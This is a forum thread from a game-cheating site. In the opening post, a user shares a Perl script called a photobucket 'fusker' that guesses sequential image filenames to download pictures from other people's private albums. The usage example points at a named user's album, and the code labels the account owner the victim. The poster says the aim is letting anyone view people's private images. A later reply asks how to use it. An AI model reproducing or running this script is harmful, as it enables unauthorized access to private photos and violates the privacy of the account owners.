Cheat Engine Forum Index Cheat Engine
The Official Site of Cheat Engine
 
 FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 


PERL photobucket fusker

 
Post new topic   Reply to topic    Cheat Engine Forum Index -> Computer Talk
View previous topic :: View next topic  
Author Message
rzers
Advanced Cheater
Reputation: 0

Joined: 03 Oct 2006
Posts: 50

PostPosted: Wed Apr 02, 2008 12:17 pm    Post subject: PERL photobucket fusker Reply with quote

Just ripped this one from zer0-day.net with permissions...
___



it searches for pictures on private photobuckets.

example: perl photo.pl 0 100 URL OF PHOTOBUCKET USER
example: perl photo.pl a z URL OF PHOTOBUCKET USER

http://s220.photobucket.com/albums/dd76/CINDYMILEN A/

Code:
#!/usr/bin/perl -w
####################
#       x90
# photobucket fusker
####################


use strict;
use WWW::Mechanize;

my $start = $ARGV[0];

my $end = $ARGV[1];

  my $victim = $ARGV[2];

   my $mech = WWW::Mechanize->new();
################################################################################
##
    foreach my $fusk ("$start" .. "$end") {
     my $url = "$victim$fusk.jpg";
      $mech->get( $url );
       my $link;
if ($link = $mech->success()) {


    my $lurl = $url;

    $mech->get( $lurl, ":content_file" => "$fusk.jpg");
}
else {
    print "Image $fusk.jpg not found\n";
   }
################################################################################
##
}

_________________
...::: www.zer0-day.net :::...
The best online place for hacking,cracking,exploits,programming,and LEARNING! <3
Back to top
View user's profile Send private message
Clavinbui
Master Cheater
Reputation: 0

Joined: 08 Dec 2007
Posts: 477
Location: New York

PostPosted: Wed Apr 02, 2008 4:05 pm    Post subject: Reply with quote

why tell us this
_________________

Back to top
View user's profile Send private message
rzers
Advanced Cheater
Reputation: 0

Joined: 03 Oct 2006
Posts: 50

PostPosted: Wed Apr 02, 2008 11:42 pm    Post subject: Reply with quote

Cause some1 actually wants to see the private images for ppl on PB...

If u dont like it, dont use it =)

_________________
...::: www.zer0-day.net :::...
The best online place for hacking,cracking,exploits,programming,and LEARNING! <3
Back to top
View user's profile Send private message
SniperHill
How do I cheat?
Reputation: 0

Joined: 09 Feb 2007
Posts: 2

PostPosted: Sat Feb 21, 2009 10:58 am    Post subject: Reply with quote

Lol, is this still workin =_= can someone explain how to do it?
Back to top
View user's profile Send private message
Display posts from previous:   
Post new topic   Reply to topic    Cheat Engine Forum Index -> Computer Talk All times are GMT - 6 Hours
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You cannot download files in this forum


Powered by phpBB © 2001, 2005 phpBB Group

CE Wiki   IRC (#CEF)   Twitter
Third party websites